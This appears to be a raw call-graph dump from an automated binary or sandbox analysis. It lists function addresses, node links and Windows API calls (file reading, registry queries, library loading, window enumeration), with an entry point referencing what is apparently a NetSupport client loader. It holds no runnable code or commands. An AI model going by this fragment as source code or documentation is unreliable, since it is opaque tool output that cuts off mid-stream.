11175121 29671->29674 29675 1116edc4 _fseek 11 API calls 29672->29675 29676 1117518b 29673->29676 29677 1116a1af _fseek 66 API calls 29674->29677 29675->29680 29681 1116a1af _fseek 66 API calls 29676->29681 29678 11175128 29677->29678 29683 1116edc4 _fseek 11 API calls 29678->29683 29679->29669 29679->29680 29682 11175165 29679->29682 29684 1117519f 29679->29684 29680->29560 29726 1117d104 98 API calls 6 library calls 29680->29726 29681->29678 29682->29669 29687 11175170 ReadFile 29682->29687 29683->29680 29686 1116ac39 __malloc_crt 66 API calls 29684->29686 29688 111751b5 29686->29688 29689 11175613 GetLastError 29687->29689 29690 1117529b 29687->29690 29691 111751bf 29688->29691 29692 111751dd 29688->29692 29693 1117549a 29689->29693 29694 11175620 29689->29694 29690->29689 29697 111752af 29690->29697 29695 1116a1af _fseek 66 API calls 29691->29695 29698 11176489 __lseeki64_nolock 68 API calls 29692->29698 29702 1116a1d5 __dosmaperr 66 API calls 29693->29702 29706 1117541f 29693->29706 29696 1116a1af _fseek 66 API calls 29694->29696 29700 111751c4 29695->29700 29701 11175625 29696->29701 29697->29706 29708 111752cb 29697->29708 29710 111754df 29697->29710 29699 111751eb 29698->29699 29699->29687 29703 1116a1c2 __read 66 API calls 29700->29703 29704 1116a1c2 __read 66 API calls 29701->29704 29702->29706 29703->29680 29704->29706 29705 11163aa5 _free 66 API calls 29705->29680 29706->29680 29706->29705 29707 111753e4 29707->29706 29719 11175494 GetLastError 29707->29719 29709 1117532f ReadFile 29708->29709 29716 111753ac 29708->29716 29713 1117534d GetLastError 29709->29713 29714 11175357 29709->29714 29710->29706 29711 11175554 ReadFile 29710->29711 29712 11175573 GetLastError 29711->29712 29715 1117557d 29711->29715 29712->29710 29712->29715 29713->29708 29713->29714 29714->29708 29721 11176489 __lseeki64_nolock 68 API calls 29714->29721 29715->29710 29722 11176489 __lseeki64_nolock 68 API calls 29715->29722 29716->29706 29716->29707 29717 11175427 29716->29717 29718 1117541a 29716->29718 29717->29707 29723 1117545e 29717->29723 29720 1116a1af _fseek 66 API calls 29718->29720 29719->29693 29720->29706 29721->29714 29722->29715 29724 11176489 __lseeki64_nolock 68 API calls 29723->29724 29725 1117546d 29724->29725 29725->29707 29726->29560 29727->29558 29728->29583 29729->29595 29730->29572 29731->29589 29732->29541 29733->29591 29734->29589 29735->29573 29736->29557 29737->29549 29738->29501 29739->29515 29740->29515 29741->29377 29742->29380 29744 1116be8d EnterCriticalSection 29743->29744 29745 1116be6b 29743->29745 29746 11164cc3 29744->29746 29745->29744 29747 1116be73 29745->29747 29749 11164c0a 29746->29749 29748 1117459f __lock 66 API calls 29747->29748 29748->29746 29750 11164c2f 29749->29750 29751 11164c1b 29749->29751 29753 11164c2b 29750->29753 29768 1116bf37 29750->29768 29766 1116a1af 66 API calls __getptd_noexit 29751->29766 29765 11164ce3 LeaveCriticalSection LeaveCriticalSection __fsopen 29753->29765 29754 11164c20 29767 1116edc4 11 API calls _fseek 29754->29767 29761 11164c49 29785 11171e64 29761->29785 29763 11164c4f 29763->29753 29764 11163aa5 _free 66 API calls 29763->29764 29764->29753 29765->29380 29766->29754 29767->29753 29769 11164c3b 29768->29769 29770 1116bf50 29768->29770 29774 11171f28 29769->29774 29770->29769 29771 1116a147 __flush 66 API calls 29770->29771 29772 1116bf6b 29771->29772 29808 111730a4 95 API calls 5 library calls 29772->29808 29775 11164c43 29774->29775 29776 11171f38 29774->29776 29778 1116a147 29775->29778 29776->29775 29777 11163aa5 _free 66 API calls 29776->29777 29777->29775 29779 1116a153 29778->29779 29780 1116a168 29778->29780 29809 1116a1af 66 API calls __getptd_noexit 29779->29809 29780->29761 29782 1116a158 29810 1116edc4 11 API calls _fseek 29782->29810 29784 1116a163 29784->29761 29786 11171e70 _fseek 29785->29786 29787 11171e78 29786->29787 29788 11171e93 29786->29788 29811 1116a1c2 66 API calls __getptd_noexit 29787->29811 29789 11171e9f 29788->29789 29794 11171ed9 29788->29794 29813 1116a1c2 66 API calls __getptd_noexit 29789->29813 29792 11171e7d 29812 1116a1af 66 API calls __getptd_noexit 29792->29812 29793 11171ea4 29814 1116a1af 66 API calls __getptd_noexit 29793->29814 29816 111778c4 29794->29816 29798 11171eac 29815 1116edc4 11 API calls _fseek 29798->29815 29799 11171edf 29801 11171eed 29799->29801 29802 11171ef9 29799->29802 29805 11171dc8 __close_nolock 69 API calls 29801->29805 29826 1116a1af 66 API calls __getptd_noexit 29802->29826 29804 11171e85 _fseek 29804->29763 29806 11171ef3 29805->29806 29827 11171f20 LeaveCriticalSection __unlock_fhandle 29806->29827 29808->29769 29809->29782 29810->29784 29811->29792 29812->29804 29813->29793 29814->29798 29815->29804 29817 111778d0 _fseek 29816->29817 29818 1117792a 29817->29818 29819 1117459f __lock 66 API calls 29817->29819 29820 1117792f EnterCriticalSection 29818->29820 29821 1117794c _fseek 29818->29821 29822 111778fc 29819->29822 29820->29821 29821->29799 29823 11177905 InitializeCriticalSectionAndSpinCount 29822->29823 29824 11177918 29822->29824 29823->29824 29828 1117795a LeaveCriticalSection _doexit 29824->29828 29826->29806 29827->29804 29828->29818 29830 11028c33 29829->29830 29832 1102927b 29829->29832 29831 11028cf0 GetModuleFileNameA 29830->29831 29842 11028c68 29830->29842 29833 11028d11 _strrchr 29831->29833 29834 11029317 29832->29834 29835 1102932a 29832->29835 29838 11164ead std::locale::_Init 140 API calls 29833->29838 29836 11162bb7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 29834->29836 29837 11162bb7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 29835->29837 29839 11029326 29836->29839 29840 1102933b 29837->29840 29841 11028ceb 29838->29841 29839->29386 29840->29386 29841->29832 29859 11026ef0 29841->29859 29844 11164ead std::locale::_Init 140 API calls 29842->29844 29844->29841 29845 11028d64 29855 110291e5 29845->29855 29862 11163ca7 29845->29862 29846 11164c77 std::locale::_Init 100 API calls 29846->29832 29850 11028da0 29851 11026ef0 std::locale::_Init 80 API calls 29850->29851 29852 11028db0 std::locale::_Init 29851->29852 29853 11026ef0 std::locale::_Init 80 API calls 29852->29853 29852->29855 29858 11028dd3 std::locale::_Init 29853->29858 29855->29846 29855->29855 29856 11026ef0 std::locale::_Init 80 API calls 29856->29858 29857 1116558e 85 API calls _LangCountryEnumProc@4 29857->29858 29858->29855 29858->29856 29858->29857 29867 11026d60 66 API calls 2 library calls 29858->29867 29868 1116535d 29859->29868 29861 11026ef9 _strpbrk 29861->29845 29863 11163c91 29862->29863 29864 1116450b __wcstoi64 79 API calls 29863->29864 29865 11028d75 29864->29865 29865->29855 29866 11026d60 66 API calls 2 library calls 29865->29866 29866->29850 29867->29858 29869 11165369 _fseek 29868->29869 29870 1116537c 29869->29870 29871 111653ad 29869->29871 29887 1116a1af 66 API calls __getptd_noexit 29870->29887 29875 1116be59 __lock_file 67 API calls 29871->29875 29877 1116538c _fseek 29871->29877 29873 11165381 29888 1116edc4 11 API calls _fseek 29873->29888 29876 111653bb 29875->29876 29878 1116a147 __flush 66 API calls 29876->29878 29881 11165431 29876->29881 29877->29861 29880 111653cc 29878->29880 29880->29881 29889 1116a1af 66 API calls __getptd_noexit 29880->29889 29883 1116545e 29881->29883 29891 11172885 29881->29891 29911 1116548d LeaveCriticalSection LeaveCriticalSection __fsopen 29883->29911 29885 11165426 29890 1116edc4 11 API calls _fseek 29885->29890 29887->29873 29888->29877 29889->29885 29890->29881 29892 11172892 29891->29892 29896 111728a7 29891->29896 29912 1116a1af 66 API calls __getptd_noexit 29892->29912 29894 11172897 29913 1116edc4 11 API calls _fseek 29894->29913 29897 111728dc 29896->29897 29905 111728a2 29896->29905 29914 11177ff0 29896->29914 29899 1116a147 __flush 66 API calls 29897->29899 29900 111728f0 29899->29900 29917 11175650 29900->29917 29902 111728f7 29903 1116a147 __flush 66 API calls 29902->29903 29902->29905 29904 1117291a 29903->29904 29904->29905 29906 1116a147 __flush 66 API calls 29904->29906 29905->29881 29907 11172926 29906->29907 29907->29905 29908 1116a147 __flush 66 API calls 29907->29908 29909 11172933 29908->29909 29910 1116a147 __flush 66 API calls 29909->29910 29910->29905 29911->29877 29912->29894 29913->29905 29915 1116ac39 __malloc_crt 66 API calls 29914->29915 29916 11178005 29915->29916 29916->29897 29918 1117565c _fseek 29917->29918 29919 11175664 29918->29919 29921 1117567f 29918->29921 29947 1116a1c2 66 API calls __getptd_noexit 29919->29947 29922 1117568b 29921->29922 29926 111756c5 29921->29926 29949 1116a1c2 66 API calls __getptd_noexit 29922->29949 29924 11175669 29948 1116a1af 66 API calls __getptd_noexit 29924->29948 29925 11175690 29950 1116a1af 66 API calls __getptd_noexit 29925->29950 29929 111756e7 29926->29929 29930 111756d2 29926->29930 29931 111778c4 ___lock_fhandle 68 API calls 29929->29931 29952 1116a1c2 66 API calls __getptd_noexit 29930->29952 29934 111756ed 29931->29934 29932 11175698 29951 1116edc4 11 API calls _fseek 29932->29951 29936 1117570f 29934->29936 29937 111756fb 29934->29937 29935 111756d7 29953 1116a1af 66 API calls __getptd_noexit 29935->29953 29954 1116a1af 66 API calls __getptd_noexit 29936->29954 29941 11175099 __read_nolock 75 API calls 29937->29941 29940 11175671 _fseek 29940->29902 29943 11175707 29941->29943 29956 1117573e LeaveCriticalSection __unlock_fhandle 29943->29956 29944 11175714 29955 1116a1c2 66 API calls __getptd_noexit 29944->29955 29947->29924 29948->29940 29949->29925 29950->29932 29951->29940 29952->29935 29953->29932 29954->29944 29955->29943 29956->29940 29957->29390 29961 111681a3 29958->29961 29964 11168124 29961->29964 29965 11168131 29964->29965 29966 1116814b 29964->29966 29982 1116a1c2 66 API calls __getptd_noexit 29965->29982 29966->29965 29967 11168154 GetFileAttributesA 29966->29967 29969 11168162 GetLastError 29967->29969 29976 11168178 29967->29976 29985 1116a1d5 66 API calls 3 library calls 29969->29985 29970 11168136 29983 1116a1af 66 API calls __getptd_noexit 29970->29983 29973 1116813d 29984 1116edc4 11 API calls _fseek 29973->29984 29974 11089b07 29974->29342 29974->29349 29975 1116816e 29986 1116a1af 66 API calls __getptd_noexit 29975->29986 29976->29974 29987 1116a1c2 66 API calls __getptd_noexit 29976->29987 29980 1116818b 29988 1116a1af 66 API calls __getptd_noexit 29980->29988 29982->29970 29983->29973 29984->29974 29985->29975 29986->29974 29987->29980 29988->29975 29989 11026ae0 29990 11026b0f std::locale::_Init 29989->29990 30005 110d1930 29990->30005 29992 11026b19 30015 111101b0 29992->30015 29995 11026b5f 30043 1105e670 439 API calls std::locale::_Init 29995->30043 29998 11026ba3 30044 11089ee0 CloseHandle 29998->30044 30000 11026bae 30045 110d0a10 262 API calls 2 library calls 30000->30045 30002 11026bbd 30003 11162bb7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 30002->30003 30004 11026bd4 30003->30004 30046 110d16d0 30005->30046 30008 110d197b 30011 110d1995 30008->30011 30012 110d1978 30008->30012 30009 110d1964 30060 11029a70 262 API calls 2 library calls 30009->30060 30011->29992 30012->30008 30061 11029a70 262 API calls 2 library calls 30012->30061 30016 11163a11 _malloc 66 API calls 30015->30016 30017 111101ce 30016->30017 30018 11110203 _memset 30017->30018 30019 111101d7 wsprintfA 30017->30019 30022 11162bb7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 30018->30022 30101 11029a70 262 API calls 2 library calls 30019->30101 30023 11026b31 30022->30023 30023->29995 30024 11061aa0 30023->30024 30102 11061710 290 API calls std::locale::_Init 30024->30102 30026 11061ade 30027 111101b0 std::locale::_Init 262 API calls 30026->30027 30028 11061b0b 30027->30028 30029 11061b24 30028->30029 30103 11061710 290 API calls std::locale::_Init 30028->30103 30031 111101b0 std::locale::_Init 262 API calls 30029->30031 30032 11061b35 30031->30032 30035 11061b4e 30032->30035 30104 11061710 290 API calls std::locale::_Init 30032->30104 30034 11061ba2 30034->29995 30035->30034 30036 11142e60 std::locale::_Init 262 API calls 30035->30036 30037 11061b76 30036->30037 30105 11061a70 30037->30105 30040 11061a70 270 API calls 30041 11061b94 30040->30041 30042 11061a70 270 API calls 30041->30042 30042->30034 30043->29998 30044->30000 30045->30002 30047 110d16dc 30046->30047 30048 110d16f7 30047->30048 30049 110d16e0 30047->30049 30062 110d03e0 30048->30062 30091 11029a70 262 API calls 2 library calls 30049->30091 30056 110d172e 30056->30008 30056->30009 30057 110d1717 30092 11029a70 262 API calls 2 library calls 30057->30092 30063 110d03e9 30062->30063 30064 110d03ed 30063->30064 30065 110d0404 30063->30065 30093 11029a70 262 API calls 2 library calls 30064->30093 30067 110d0401 30065->30067 30068 110d0438 30065->30068 30067->30065 30094 11029a70 262 API calls 2 library calls 30067->30094 30070 110d0435 30068->30070 30071 110d0456 30068->30071 30070->30068 30095 11029a70 262 API calls 2 library calls 30070->30095 30074 110d12e0 30071->30074 30075 110d12ee 30074->30075 30076 110d12f2 30075->30076 30080 110d1309 30075->30080 30096 11029a70 262 API calls 2 library calls 30076->30096 30078 110d13b0 30078->30056 30078->30057 30079 110d133c 30079->30078 30098 110d0c30 262 API calls std::locale::_Init 30079->30098 30080->30079 30080->30080 30082 110d1306 30080->30082 30082->30080 30097 11029a70 262 API calls 2 library calls 30082->30097 30083 110d1363 30087 110d136f _memmove 30083->30087 30099 110d0b70 265 API calls 2 library calls 30083->30099 30087->30078 30088 110d1399 30087->30088 30100 11029a70 262 API calls 2 library calls 30088->30100 30098->30083 30099->30087 30102->30026 30103->30029 30104->30035 30108 11061970 30105->30108 30119 11061290 30108->30119 30112 11061a08 30166 11061170 69 API calls std::ios_base::_Tidy 30112->30166 30114 11061a1a 30115 11162bb7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 30114->30115 30117 11061a32 30115->30117 30116 110619cc 30116->30112 30118 11061320 270 API calls 30116->30118 30117->30040 30118->30116 30120 111101b0 std::locale::_Init 262 API calls 30119->30120 30121 110612ac 30120->30121 30122 110612f5 30121->30122 30123 110612b3 30121->30123 30174 1116305a 66 API calls std::exception::_Copy_str 30122->30174 30167 1105ee10 30123->30167 30126 11061304 30175 111634b1 RaiseException 30126->30175 30127 110612eb 30130 11061320 30127->30130 30129 11061319 30131 11061635 30130->30131 30134 11061355 30130->30134 30131->30116 30132 11061624 30133 1105ee10 68 API calls 30132->30133 30133->30131 30135 110614b4 30134->30135 30137 11061401 RegEnumValueA 30134->30137 30138 11061389 RegQueryInfoKeyA 30134->30138 30135->30132 30144 11061542 std::ios_base::_Tidy 30135->30144 30176 110611e0 30135->30176 30140 11061435 30137->30140 30141 1106149c 30137->30141 30142 110613c2 30138->30142 30143 110613ae 30138->30143 30151 1106146e RegEnumValueA 30140->30151 30164 11061649 std::ios_base::_Tidy 30140->30164 30187 11081d30 30140->30187 30191 11081e70 86 API calls 2 library calls 30140->30191 30147 11163aa5 _free 66 API calls 30141->30147 30153 110613e2 30142->30153 30186 11029a70 262 API calls 2 library calls 30142->30186 30185 11029a70 262 API calls 2 library calls 30143->30185 30144->30132 30152 110615a0 30144->30152 30160 11081d30 IsDBCSLeadByte 30144->30160 30144->30164 30195 11146a90 30144->30195 30198 11081e70 86 API calls 2 library calls 30144->30198 30148 110614a9 30147->30148 30148->30135 30150 11163a11 _malloc 66 API calls 30154 110613f0 30150->30154 30151->30140 30151->30141 30152->30144 30194 11029a70 262 API calls 2 library calls 30152->30194 30153->30150 30154->30137 30160->30144 30162 11061532 30193 1105fdc0 85 API calls _LangCountryEnumProc@4 30162->30193 30164->30116 30166->30114 30168 1105ee21 LeaveCriticalSection 30167->30168 30169 1105ee2b 30167->30169 30168->30169 30170 1105ee3f 30169->30170 30171 11163aa5 _free 66 API calls 30169->30171 30172 1105ee85 30170->30172 30173 1105ee49 EnterCriticalSection 30170->30173 30171->30170 30172->30127 30173->30127 30174->30126 30175->30129 30177 110611ee 30176->30177 30178 11061208 30176->30178 30199 110608e0 30177->30199 30178->30144 30182 11145bc0 30178->30182 30180 11061200 30207 110610f0 30180->30207 30243 111434c0 30182->30243 30188 11081d3c 30187->30188 30190 11081d41 std::locale::_Init 30187->30190 30250 11081c50 IsDBCSLeadByte 30188->30250 30190->30140 30191->30140 30192 1105ef20 262 API calls std::locale::_Init 30192->30162 30193->30144 30251 11145be0 30195->30251 30198->30144 30200 110608f4 30199->30200 30201 1106092c 30199->30201 30200->30201 30202 110608f8 30200->30202 30203 11060992 30201->30203 30211 11060470 67 API calls 2 library calls 30201->30211 30210 110606d0 66 API calls std::ios_base::_Tidy 30202->30210 30203->30180 30206 11060903 30206->30180 30212 110609a0 30207->30212 30209 1106110b 30209->30178 30209->30209 30210->30206 30211->30201 30213 110609df 30212->30213 30219 11060a24 30212->30219 30220 11060820 30213->30220 30216 110609a0 263 API calls 30217 11060a16 30216->30217 30218 110609a0 263 API calls 30217->30218 30218->30219 30219->30209 30221 111101b0 std::locale::_Init 262 API calls 30220->30221 30222 11060854 30221->30222 30223 11060862 30222->30223 30224 110608b9 30222->30224 30231 11060100 30223->30231 30235 1116305a 66 API calls std::exception::_Copy_str 30224->30235 30228 110608c8 30236 111634b1 RaiseException 30228->30236 30230 110608dd 30232 11060134 30231->30232 30233 11060141 30231->30233 30237 1105f7c0 30232->30237 30233->30216 30235->30228 30236->30230 30238 1105f7d2 30237->30238 30239 11110230 std::locale::_Init 262 API calls 30238->30239 30240 1105f7e2 30239->30240 30241 11163a11 _malloc 66 API calls 30240->30241 30242 1105f80b _memmove 30241->30242 30242->30233 30244 111434d0 30243->30244 30244->30244 30245 11110230 std::locale::_Init 262 API calls 30244->30245 30246 111434f8 30245->30246 30249 111433d0 7 API calls 3 library calls 30246->30249 30248 1106151f 30248->30192 30249->30248 30250->30190 30252 11145bf0 30251->30252 30252->30252 30253 11110230 std::locale::_Init 262 API calls 30252->30253 30254 11145c02 30253->30254 30257 11145b10 30254->30257 30256 11145c10 30256->30144 30258 11145b27 _strncpy 30257->30258 30261 11145b62 __crtGetStringTypeA_stat 30257->30261 30258->30258 30259 11162bb7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 30258->30259 30260 11145b5e 30259->30260 30260->30256 30266 11143340 WideCharToMultiByte GetLastError 30261->30266 30263 11145ba6 30264 11162bb7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 30263->30264 30265 11145bb9 30264->30265 30265->30256 30266->30263 30267 11031780 30268 1103178e 30267->30268 30269 11146a90 264 API calls 30268->30269 30270 1103179f SetUnhandledExceptionFilter 30269->30270 30271 110317af std::locale::_Init 30270->30271 30272 e31020 GetCommandLineW 30274 e31035 GetStartupInfoW 30272->30274 30275 e31091 30274->30275 30276 e31096 GetModuleHandleW 30274->30276 30275->30276 30279 e31000 _NSMClient32 30276->30279 30278 e310a8 ExitProcess 30279->30278 30280 11144dd0 30281 11144de1 30280->30281 30294 111447f0 30281->30294 30285 11144e65 30288 11144e82 30285->30288 30290 11144e64 30285->30290 30286 11144e2b 30287 11144e32 ResetEvent 30286->30287 30302 111449b0 262 API calls 2 library calls 30287->30302 30290->30285 30303 111449b0 262 API calls 2 library calls 30290->30303 30291 11144e46 SetEvent WaitForMultipleObjects 30291->30287 30291->30290 30293 11144e7f 30293->30288 30295 111447fc GetCurrentProcess 30294->30295 30296 1114481f 30294->30296 30295->30296 30297 1114480d GetModuleFileNameA 30295->30297 30298 111101b0 std::locale::_Init 260 API calls 30296->30298 30300 11144849 WaitForMultipleObjects 30296->30300 30297->30296 30299 1114483b 30298->30299 30299->30300 30304 11144140 GetModuleFileNameA 30299->30304 30300->30285 30300->30286 30302->30291 30303->30293 30305 11144183 30304->30305 30307 111441c3 30304->30307 30306 11081e00 std::locale::_Init IsDBCSLeadByte 30305->30306 30308 11144191 30306->30308 30309 111441cf LoadLibraryA 30307->30309 30310 111441e9 GetModuleHandleA GetProcAddress 30307->30310 30308->30307 30314 11144198 LoadLibraryA 30308->30314 30309->30310 30311 111441de LoadLibraryA 30309->30311 30312 11144217 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 30310->30312 30313 11144209 30310->30313 30311->30310 30315 11144243 10 API calls 30312->30315 30313->30315 30314->30307 30316 11162bb7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 30315->30316 30317 111442c0 30316->30317 30317->30300 30318 11146010 30319 11146031 30318->30319 30320 1114610d 30318->30320 30332 11145f00 30319->30332 30322 11162bb7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 30320->30322 30324 11146117 30322->30324 30325 11146044 _memset 30326 1114605a GetVersionExA LoadLibraryA 30325->30326 30327 111460a1 GetProcAddress 30326->30327 30328 111460ca GetSystemDefaultLangID 30326->30328 30329 111460b1 30327->30329 30330 111460be FreeLibrary 30327->30330 30331 111460db 30328->30331 30329->30330 30330->30328 30330->30331 30331->30320 30334 11145f30 30332->30334 30333 11145f5f RegOpenKeyExA 30333->30334 30334->30333 30336 11145fee 30334->30336 30337 11145fcd RegCloseKey 30334->30337 30339 11163ca7 std::locale::_Init 79 API calls 30334->30339 30341 11143bd0 RegQueryValueExA 30334->30341 30338 11162bb7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 30336->30338 30337->30334 30337->30336 30340 11146001 30338->30340 30339->30334 30340->30320 30340->30325 30342 11143bfa 30341->30342 30342->30334 30343 11143a50 30344 11143a5f 30343->30344 30345 11143a59 30343->30345 30346 1102ad70 std::locale::_Init 142 API calls 30344->30346 30347 11143a76 30346->30347 30348 11145ef0 30351 11145c70 30348->30351 30350 11145efb 30352 11145c91 GetVersionExA 30351->30352 30363 11145e6c 30351->30363 30353 11145cb3 30352->30353 30352->30363 30355 11145cc0 RegOpenKeyExA 30353->30355 30353->30363 30354 11145e75 30356 11162bb7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 30354->30356 30360 11145ced _memset 30355->30360 30355->30363 30357 11145e82 30356->30357 30357->30350 30358 11145ed4 30359 11162bb7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 30358->30359 30361 11145ee4 30359->30361 30362 11143bd0 std::locale::_Init RegQueryValueExA 30360->30362 30361->30350 30364 11145d2f 30362->30364 30363->30354 30363->30358 30384 11081f20 86 API calls 2 library calls 30363->30384 30366 11143bd0 std::locale::_Init RegQueryValueExA 30364->30366 30368 11145d59 30366->30368 30367 11145ebc 30367->30354 30369 11163ca7 std::locale::_Init 79 API calls 30367->30369 30370 11145e5f RegCloseKey 30368->30370 30372 11163ca7 std::locale::_Init 79 API calls 30368->30372 30371 11145ecd 30369->30371 30370->30363 30371->30354 30371->30358 30373 11145d6e 30372->30373 30374 111648ed std::locale::_Init 79 API calls 30373->30374 30375 11145d7d 30374->30375 30376 11145d96 30375->30376 30377 111648ed std::locale::_Init 79 API calls 30375->30377 30378 11163ca7 std::locale::_Init 79 API calls 30376->30378 30377->30375 30380 11145da2 _strncpy 30378->30380 30379 11145e41 30379->30370 30380->30379 30381 11143bd0 std::locale::_Init RegQueryValueExA 30380->30381 30382 11145e18 30381->30382 30383 11143bd0 std::locale::_Init RegQueryValueExA 30382->30383 30383->30379 30384->30367 30385 11015530 LoadLibraryA 30386 11016730 30410 110cf130 30386->30410 30389 111101b0 std::locale::_Init 262 API calls 30390 1101676d 30389->30390 30391 1101678d 30390->30391 30465 11014470 263 API calls 30390->30465 30393 111101b0 std::locale::_Init 262 API calls 30391->30393 30394 110167a1 30393->30394 30395 110167b2 30394->30395 30396 110167b9 GetDlgItem 30394->30396 30466 11015da0 270 API calls 30395->30466 30399 110167e4 SendMessageA SendMessageA 30396->30399 30467 11018690 LoadLibraryA 30399->30467 30402 11016846 30468 11018780 GetProcAddress 30402->30468 30404 11016865 LoadLibraryA EnumWindows 30406 110168e2 FreeLibrary 30404->30406 30407 110168e5 30404->30407 30406->30407 30408 110168f2 30407->30408 30409 110168ef FreeLibrary 30407->30409 30409->30408 30411 110cf173 30410->30411 30452 110cf34f std::ios_base::_Tidy 30410->30452 30412 110cf181 GetDlgItem 30411->30412 30474 11160440 266 API calls 30411->30474 30415 110cf1b5 30412->30415 30416 110cf196 30412->30416 30413 11162bb7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 30417 11016766 30413->30417 30418 110cf1bb 30415->30418 30419 110cf1d2 GetWindowRect 30415->30419 30475 11089430 265 API calls std::locale::_Init 30416->30475 30417->30389 30476 11029a70 262 API calls 2 library calls 30418->30476 30421 110cf1e7 GetObjectA 30419->30421 30469 110cce60 98 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 30421->30469 30424 110cf1a6 30424->30415 30426 110cf1ad ShowWindow 30424->30426 30426->30415 30428 110cf235 30429 110cf24f 30428->30429 30430 110cf266 GetWindowTextA 30428->30430 30477 11029a70 262 API calls 2 library calls 30429->30477 30431 110cf294 30430->30431 30432 110cf287 30430->30432 30435 110cf292 30431->30435 30479 110cb940 282 API calls 30431->30479 30478 110cb750 282 API calls 2 library calls 30432->30478 30438 110cf2d1 30435->30438 30439 110cf2ab 30435->30439 30440 110cf2c2 30435->30440 30441 110cf2df 30438->30441 30442 110cf2f6 GetWindowLongA 30438->30442 30480 11029a70 262 API calls 2 library calls 30439->30480 30481 11088be0 6 API calls ___DllMainCRTStartup 30440->30481 30482 11029a70 262 API calls 2 library calls 30441->30482 30446 110cf30d 30442->30446 30442->30452 30449 111101b0 std::locale::_Init 262 API calls 30446->30449 30450 110cf314 30449->30450 30453 110cf330 30450->30453 30483 110ce010 262 API calls std::locale::_Init 30450->30483 30452->30413 30453->30452 30455 110cf387 30453->30455 30470 11145080 30453->30470 30456 110cf3b8 GetClientRect 30455->30456 30457 110cf3a1 30455->30457 30485 110963a0 30456->30485 30484 11029a70 262 API calls 2 library calls 30457->30484 30461 110cf3d0 CreateWindowExA 30486 110ce050 269 API calls 2 library calls 30461->30486 30463 110cf411 30487 11146190 305 API calls std::locale::_Init 30463->30487 30465->30391 30466->30396 30467->30402 30468->30404 30469->30428 30471 1114508e 30470->30471 30472 11145089 30470->30472 30471->30455 30488 11145010 GetModuleFileNameA ExtractIconExA 30472->30488 30474->30412 30475->30424 30478->30435 30479->30435 30481->30438 30483->30453 30485->30461 30486->30463 30487->30452 30489 11162bb7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 30488->30489 30490 11145078 30489->30490 30490->30471 30491 11138580 30492 1113859f 30491->30492 30493 1105e820 79 API calls 30492->30493 30494 111385c6 30493->30494 30495 11138711 30494->30495 30496 111385ce 30494->30496 30497 11162bb7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 30495->30497 30498 11147060 std::locale::_Init 21 API calls 30496->30498 30500 1113872c 30497->30500 30499 111385d9 GetTickCount 30498->30499 30524 11096d90 CoInitialize 30499->30524 30503 11138607 30506 111386e2 30503->30506 30510 11138616 _memset std::locale::_Init 30503->30510 30504 111385fc 30505 11147060 std::locale::_Init 21 API calls 30504->30505 30505->30503 30507 11147060 std::locale::_Init 21 API calls 30506->30507 30508 111386ec 30507->30508 30509 11162bb7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 30508->30509 30511 1113870b 30509->30511 30512 11138638 GetModuleFileNameA 30510->30512 30513 1113865d _strrchr 30512->30513 30514 1102ad70 std::locale::_Init 142 API calls 30513->30514 30515 11138672 30514->30515 30539 110154d0 30515->30539 30517 1113868b 30518 11163aa5 _free 66 API calls 30517->30518 30519 111386af 30518->30519 30520 11147060 std::locale::_Init 21 API calls 30519->30520 30521 111386ba 30520->30521 30522 11162bb7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 30521->30522 30523 111386dc 30522->30523 30525 11096db1 30524->30525 30526 11096db5 CLSIDFromProgID 30524->30526 30525->30526 30527 11096dff 30525->30527 30528 11096df9 CoUninitialize 30526->30528 30529 11096dc8 CoCreateInstance 30526->30529 30544 11019660 30527->30544 30528->30527 30529->30528 30530 11096de5 30529->30530 30530->30528 30537 11162bb7 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 30538 11096e2f GetTickCount 30537->30538 30538->30503 30538->30504 30540 11163aa5 _free 66 API calls 30539->30540 30541 110154df 30540->30541 30542 11163a11 _malloc 66 API calls 30541->30542 30543 11015505 30541->30543 30542->30543 30543->30517 30545 11019698 30544->30545 30551 11019712 30545->30551 30573 1100f8a0 67 API calls 30545->30573 30548 11019813 30549 1101982d 30548->30549 30575 1100fb80 67 API calls 30548->30575 30552 11010ae0 30549->30552 30551->30548 30574 1100dec0 67 API calls 2 library calls 30551->30574 30554 11010b25 30552->30554 30553 11010b49 30567 11010bba 30553->30567 30576 1100db10 30553->30576 30554->30553 30602 1100f8a0 67 API calls 30554->30602 30561 11010c52 30568 11019aa0 30561->30568 30562 11010c3b 30562->30561 30612 1100fb80 67 API calls 30562->30612 30567->30562 30611 1100dec0 67 API calls 2 library calls 30567->30611 30833 11019920 30568->30833 30570 11019af7 30570->30537 30573->30551 30574->30548 30575->30549 30577 11161531 std::_Lockit::_Lockit EnterCriticalSection 30576->30577 30578 1100db31 30577->30578 30579 11161559 std::locale::_Init LeaveCriticalSection 30578->30579 30580 1100db45 30579->30580 30581 11010140 30580->30581 30582 11161531 std::_Lockit::_Lockit EnterCriticalSection 30581->30582 30583 11010172 30582->30583 30584 11161531 std::_Lockit::_Lockit EnterCriticalSection 30583->30584 30587 110101b6 30583->30587 30585 11010195 30584->30585 30586 11161559 std::locale::_Init LeaveCriticalSection 30585->30586 30586->30587 30601 